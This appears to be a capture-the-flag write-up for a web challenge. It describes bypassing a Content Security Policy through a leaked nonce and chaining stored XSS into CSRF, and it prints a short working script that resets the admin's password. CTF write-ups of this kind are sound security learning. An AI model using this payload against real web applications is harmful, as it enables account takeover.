➜ ~

Playing Hacks and Stuffs!

---

Project maintained by h4ckyou Hosted on GitHub Pages — Theme by mattgraham

Here’s the writeup I put up on my team mate blog: @writeup

Fafame

Going over the url shows this

We have the option to register and login

So I will register since I don’t have any credentials

After I registered I got this

From that we can see we would be able to write any html tag but javascript is disabled

When I clicked create New note I got this

I can inject any tag I want

After creating it I got this

Ok it actually allows any tag

But it isn’t executed

We can share the note to the admin

I tried to inject script tag to alert ‘test’

But it didn’t work though the tag is there

The interesting thing to think is that why isn’t that javascript executing?

Well if you take a look at debug console you will see this

There’s CSP which would prevent us from performing XSS

But actually the response gives the nonce

So because we have that we can bypass the CSP

Looking around the web app shows this function

We can reset our password

Now this is interesting because we know that we can share our note to the admin user and we have XSS

So this gives us an opportunity to escalate the XSS to CSRF

This is the request made when resetting a password

We can now leverage this to change the admin password

Here’s the exploit script

<script nonce=2726c7f26c>

  const url = 'https://ctftogo-b6247a6b4d3c-markdown-1.chals.io/profile';
  fetch(url, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'password=chained',
  });

</script>

I created a note with that content

Then I shared it to admin

We can now login with admin:chained

And the flag is shown after login in

Flag: flag{look_at_me_im_the_admin_now}